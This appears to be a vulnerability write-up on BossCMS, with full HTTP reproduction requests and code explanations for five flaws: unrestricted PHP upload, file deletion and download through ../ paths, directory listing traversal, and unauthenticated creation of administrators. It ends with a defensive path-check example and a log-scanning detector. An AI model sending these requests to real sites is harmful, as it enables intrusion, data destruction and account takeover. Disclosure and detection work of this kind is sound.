1. Arbitrary file upload
Restriction
Reproduction
POST /system/extend/ueditor/php/controller.php?action=uploadfile&encode=utf-8 HTTP/1.1
Host: bosscms.com
Content-Length: 761
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAsLBZuxNv1g9kBB0
Accept: */*
Origin: http://bosscms.com
Referer: http://bosscms.com/system/extend/ueditor/dialogs/attachment/attachment.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=sle15srngo4hspjv2d7ifia6b5
Connection: close

------WebKitFormBoundaryAsLBZuxNv1g9kBB0
Content-Disposition: form-data; name="id"

WU_FILE_0
------WebKitFormBoundaryAsLBZuxNv1g9kBB0
Content-Disposition: form-data; name="name"

1.php
------WebKitFormBoundaryAsLBZuxNv1g9kBB0
Content-Disposition: form-data; name="type"

application
------WebKitFormBoundaryAsLBZuxNv1g9kBB0
Content-Disposition: form-data; name="lastModifiedDate"

Wed Jun 07 2023 17:22:54 GMT+0800 (中國標準時間)
------WebKitFormBoundaryAsLBZuxNv1g9kBB0
Content-Disposition: form-data; name="size"

20
------WebKitFormBoundaryAsLBZuxNv1g9kBB0
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
------WebKitFormBoundaryAsLBZuxNv1g9kBB0--
With the allowed upload types configured, uploading a php file through the editor is rejected.
Uploading the file directly to the link (the upload endpoint) goes through, and the access URL is returned after the upload.
Code
The upload logic only checks whether a file was uploaded and checks its size; it does nothing about the file extension or its content.
2. Arbitrary file deletion
Restriction
POST request, path=upload
Reproduction
POST /system/extend/ueditor/php/controller.php?action=delete HTTP/1.1
Host: bosscms.com
Content-Length: 17
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://bosscms.com
Referer: http://bosscms.com/system/extend/ueditor/dialogs/image/image.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=g9uga15pd36g46d51ngsrk5mg5
Connection: close

path=upload/1.txt
Code
The same file contains a delete function, which checks that the path parameter of the POST request exists and that it starts with upload.
It then checks whether store_type in config is empty: if it is not empty it calls the delete() method of the oss class, otherwise the delete() method of the dir class. Searching for store_type shows that this setting selects the storage backend and defaults to 0, so the dir class's delete() is the one that runs.
replace performs a simple substitution on path that does not touch the characters needed here, so ../ can be written straight into the path. The if then checks whether a file exists at that path and, if so, deletes it directly.
3. Arbitrary file download
Restriction
mold=safe&part=backup&func=download&id=../../basic/1.txt
Reproduction
GET /admin/?mold=safe&part=backup&func=download&id=../../basic/1.txt HTTP/1.1
Host: bosscms.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://bosscms.com/admin/?mold=safe&part=backup&func=table
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=g9uga15pd36g46d51ngsrk5mg5
Connection: close
Code
It checks whether the id parameter exists; if so, it concatenates it into the SQL and into a path that is assigned to $file. It then checks whether $file is a file and, if so, sends the headers and calls readfile($file), reading the file directly.
4. Directory traversal
Restriction
action=listfile&folder=../
Reproduction
GET /system/extend/ueditor/php/controller.php?action=listfile&folder=../ HTTP/1.1
Host: bosscms.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: */*
Referer: http://bosscms.com/admin/?mold=site&part=site&func=init
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=g9uga15pd36g46d51ngsrk5mg5
Connection: close
Code
The config first maps fileManagerActionName (list files) to the listfile function; listfile then checks whether the GET parameters start and size exist and are numeric.
It then calls lists, which takes the folder parameter and calls the arrExist function to check whether the key exists in the array; if it does, key and value are separated, otherwise an empty value is returned; the result is assigned to $folder. $path = dir::replace($path.'/'.$folder) concatenates $path with / and $folder and then runs replace; every subsequent operation on $path is a read that uses the path directly.
opendir() and readdir() open the directory and read its contents.
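The delete, download and listfile cases above all share one defect: a prefix check (path must start with upload) or no check at all, plus a replace that never removes ../. The following added example (not BossCMS code; the helper names and the temporary site layout are assumptions) shows why the prefix check alone accepts a traversal path and how a containment check on the resolved real path rejects it.

```python
import os
import tempfile
from typing import Optional


def prefix_check_only(path: str) -> bool:
    """Weak check modelled on the delete() logic above: the path must begin
    with 'upload' and a simple replace normalises separators. This is an
    assumed simplification of dir::replace; the point is it never touches '../'."""
    cleaned = path.replace("\\", "/").replace("//", "/")
    return cleaned.startswith("upload")


def resolve_inside(site_root: str, allowed_dir: str, user_path: str) -> Optional[str]:
    """Hardened check: resolve the user-supplied path against the site root and
    accept it only if the real path still lies inside allowed_dir.
    Returns the resolved absolute path, or None if it escapes the directory."""
    allowed = os.path.realpath(allowed_dir)
    candidate = os.path.realpath(os.path.join(os.path.realpath(site_root), user_path))
    if candidate == allowed or candidate.startswith(allowed + os.sep):
        return candidate
    return None


def demo() -> dict:
    """Builds a constructed site tree in a temp dir and runs both checks on a
    legitimate name and on traversal names of the kind shown in the write-up."""
    site = tempfile.mkdtemp()
    upload = os.path.join(site, "upload")
    os.makedirs(upload)
    os.makedirs(os.path.join(site, "config"))
    open(os.path.join(upload, "1.txt"), "w").close()
    open(os.path.join(site, "config", "db.php"), "w").close()  # constructed target file
    legit = "upload/1.txt"
    traversal = "upload/../config/db.php"  # starts with 'upload', so the weak check passes
    return {
        "weak_legit": prefix_check_only(legit),
        "weak_traversal": prefix_check_only(traversal),
        "safe_legit": resolve_inside(site, upload, legit) is not None,
        "safe_traversal": resolve_inside(site, upload, traversal) is not None,
        # listfile-style folder=../ relative to the upload directory
        "safe_folder_up": resolve_inside(upload, upload, "../") is not None,
    }


if __name__ == "__main__":
    print(demo())
```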
5. Unauthenticated addition of an administrator
Restriction
mold=manager&part=manager&func=add
------WebKitFormBoundaryrrq418NZS9wguXwR
Content-Disposition: form-data; name="username"

eeee
------WebKitFormBoundaryrrq418NZS9wguXwR
Content-Disposition: form-data; name="password"

qwert
------WebKitFormBoundaryrrq418NZS9wguXwR
Content-Disposition: form-data; name="passwords"

qwert
------WebKitFormBoundaryrrq418NZS9wguXwR
Content-Disposition: form-data; name="level"

2
Reproduction
POST /admin/?mold=manager&part=manager&func=add HTTP/1.1
Host: bosscms.com
Content-Length: 395
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://bosscms.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryrrq418NZS9wguXwR
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://bosscms.com/admin/?mold=manager&part=manager&func=edit
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=g9uga15pd36g46d51ngsrk5mg5
Connection: close

------WebKitFormBoundaryrrq418NZS9wguXwR
Content-Disposition: form-data; name="username"

test
------WebKitFormBoundaryrrq418NZS9wguXwR
Content-Disposition: form-data; name="password"

qwert
------WebKitFormBoundaryrrq418NZS9wguXwR
Content-Disposition: form-data; name="passwords"

qwert
------WebKitFormBoundaryrrq418NZS9wguXwR
Content-Disposition: form-data; name="level"

2
Capture the add-administrator request, log out, and resend it: the administrator is added successfully and the response redirects to the login page.
Code
On a POST request, $data is built as an array; an if checks that the new password and the repeated password match: if neither is empty, and then if the two are equal, the md5 of the password is assigned to $data[password].
To reach alert(保存成功) ("saved successfully") the if..else conditions must not be met. Here the id does not exist, so in the else branch the username must not already exist and the level must not equal 1; the code then leaves the conditional and executes alert(保存成功). At no point is the user's login state verified.
The code also does no XSS sanitisation of username, so XSS is present here as well.
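Because the five endpoints above can be reached without a session, the request patterns are worth watching for in web server access logs. This added example (not BossCMS code) parses constructed combined-format log lines that mirror the requests in this write-up and flags traversal sequences in any query parameter, calls to the sensitive ueditor actions, and administrator creation requests for session correlation; the addresses and timestamps in the sample are made up.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed access-log lines mirroring the requests in the write-up.
SAMPLE_LOG = """\
10.0.0.5 - - [07/Jun/2023:17:22:54 +0800] "POST /system/extend/ueditor/php/controller.php?action=uploadfile&encode=utf-8 HTTP/1.1" 200 312
10.0.0.5 - - [07/Jun/2023:17:23:10 +0800] "POST /system/extend/ueditor/php/controller.php?action=delete HTTP/1.1" 200 27
10.0.0.5 - - [07/Jun/2023:17:24:01 +0800] "GET /admin/?mold=safe&part=backup&func=download&id=../../basic/1.txt HTTP/1.1" 200 4096
10.0.0.5 - - [07/Jun/2023:17:24:30 +0800] "GET /system/extend/ueditor/php/controller.php?action=listfile&folder=..%2F HTTP/1.1" 200 889
10.0.0.5 - - [07/Jun/2023:17:25:00 +0800] "POST /admin/?mold=manager&part=manager&func=add HTTP/1.1" 302 0
10.0.0.9 - - [07/Jun/2023:17:26:00 +0800] "GET /admin/?mold=site&part=site&func=init HTTP/1.1" 200 5120
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})')
UEDITOR = "/system/extend/ueditor/php/controller.php"
UEDITOR_ACTIONS = {"uploadfile", "delete", "listfile"}  # reachable without a session per the write-up
TRAVERSAL = re.compile(r"(^|[\\/])\.\.([\\/]|$)")


def classify(line: str) -> list:
    """Returns the reasons a single log line is suspicious ([] if none)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    url = urlsplit(m["uri"])
    # parse_qs decodes once; the extra unquote also catches double-encoded '../'
    params = {k: [unquote(v) for v in vs]
              for k, vs in parse_qs(url.query, keep_blank_values=True).items()}
    reasons = []
    for key, values in params.items():
        for value in values:
            if TRAVERSAL.search(value):
                reasons.append(f"traversal in {key}={value}")
    if url.path == UEDITOR:
        for action in params.get("action", []):
            if action in UEDITOR_ACTIONS:
                reasons.append(f"ueditor action={action} (no auth check on this endpoint)")
    if url.path.startswith("/admin/") and params.get("part") == ["manager"] and params.get("func") == ["add"]:
        reasons.append("manager account added; confirm an admin session existed")
    return reasons


def scan(log_text: str) -> list:
    """Runs classify() over every line and returns (ip, uri, reasons) for each hit."""
    hits = []
    for line in log_text.splitlines():
        reasons = classify(line)
        if reasons:
            m = LOG_RE.match(line)
            hits.append((m["ip"], m["uri"], reasons))
    return hits
```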